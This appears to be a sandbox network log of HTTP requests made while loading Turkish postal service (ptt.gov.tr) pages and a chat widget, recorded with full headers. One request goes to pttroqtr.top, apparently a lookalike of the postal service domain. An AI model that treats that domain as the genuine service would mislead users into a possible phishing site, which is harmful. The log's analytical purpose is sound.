Source: global trafficHTTP traffic detected: GET /_next/static/css/81d8b40497d071a4.css HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1
Source: global trafficHTTP traffic detected: GET /_next/static/css/6243e9b9a276eab5.css HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1
Source: global trafficHTTP traffic detected: GET /_next/static/css/21ec1dd6e7fd01ba.css HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1
Source: global trafficHTTP traffic detected: GET /_next/image?url=%2F_next%2Fstatic%2Fmedia%2F183logo.a09f11f7.png&w=256&q=75 HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1
Source: global trafficHTTP traffic detected: GET /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fyuzyil.ed9dd94c.png&w=1080&q=75 HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1
Source: global trafficHTTP traffic detected: GET /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ffooter-logo.568f7be2.png&w=1080&q=75 HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/_app-a58333aebeb24bd1.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1
Source: global trafficHTTP traffic detected: GET /_next/static/3nPo4dxLHf5a0RshtsAsa/_ssgManifest.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1
Source: global trafficHTTP traffic detected: GET /_next/static/3nPo4dxLHf5a0RshtsAsa/_middlewareManifest.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1
Source: global trafficHTTP traffic detected: GET /_next/static/3nPo4dxLHf5a0RshtsAsa/_buildManifest.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1
Source: global trafficHTTP traffic detected: GET /static/assets/bootstrap/css/bootstrap.min.css HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://chatserver.alo-tech.com/content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.trAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/fontawesome/css/all.min.css HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://chatserver.alo-tech.com/content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.trAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/css/google_fonts.css HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://chatserver.alo-tech.com/content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.trAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/css/page_spa.css HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://chatserver.alo-tech.com/content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.trAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/css/owl.carousel.min.css HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://chatserver.alo-tech.com/content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.trAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /font-awesome/3.2.1/css/font-awesome.css HTTP/1.1Host: netdna.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/alochat.css?wid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/_error-32d9baaae5c99c79.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4110-03c15b7eaf980721.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1
Source: global trafficHTTP traffic detected: GET /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ffooter-logo.568f7be2.png&w=256&q=75 HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1
Source: global trafficHTTP traffic detected: GET /static/assets/css/owl.theme.default.min.css HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://chatserver.alo-tech.com/content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.trAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9348-b9f3a774e6fafc61.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1
Source: global trafficHTTP traffic detected: GET /_next/image?url=%2F_next%2Fstatic%2Fmedia%2F183logo.a09f11f7.png&w=256&q=75 HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1
Source: global trafficHTTP traffic detected: GET /_next/static/css/21ec1dd6e7fd01ba.css HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1
Source: global trafficHTTP traffic detected: GET /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ffooter-logo.568f7be2.png&w=1080&q=75 HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1
Source: global trafficHTTP traffic detected: GET /_next/static/css/6243e9b9a276eab5.css HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1
Source: global trafficHTTP traffic detected: GET /static/assets/js/jquery-2.0.3.min.js HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://chatserver.alo-tech.com/content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.trAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/js/ua-parser.min.js HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://chatserver.alo-tech.com/content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.trAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/bootstrap/js/bootstrap.min.js HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://chatserver.alo-tech.com/content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.trAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjeaI HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/css/81d8b40497d071a4.css HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1727494784.1.0.1727494784.0.0.0; _ga=GA1.1.1443587032.1727494784
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4412-8214ad20a138381f.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1727494784.1.0.1727494784.0.0.0; _ga=GA1.1.1443587032.1727494784
Source: global trafficHTTP traffic detected: GET /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fyuzyil.ed9dd94c.png&w=1080&q=75 HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1727494784.1.0.1727494784.0.0.0; _ga=GA1.1.1443587032.1727494784
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/%5Bslug%5D-88e5a3b326ec670d.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1727494784.1.0.1727494784.0.0.0; _ga=GA1.1.1443587032.1727494784
Source: global trafficHTTP traffic detected: GET /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ffooter-logo.568f7be2.png&w=256&q=75 HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1727494784.1.0.1727494784.0.0.0; _ga=GA1.1.1443587032.1727494784
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9348-b9f3a774e6fafc61.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1727494784.1.0.1727494784.0.0.0; _ga=GA1.1.1443587032.1727494784
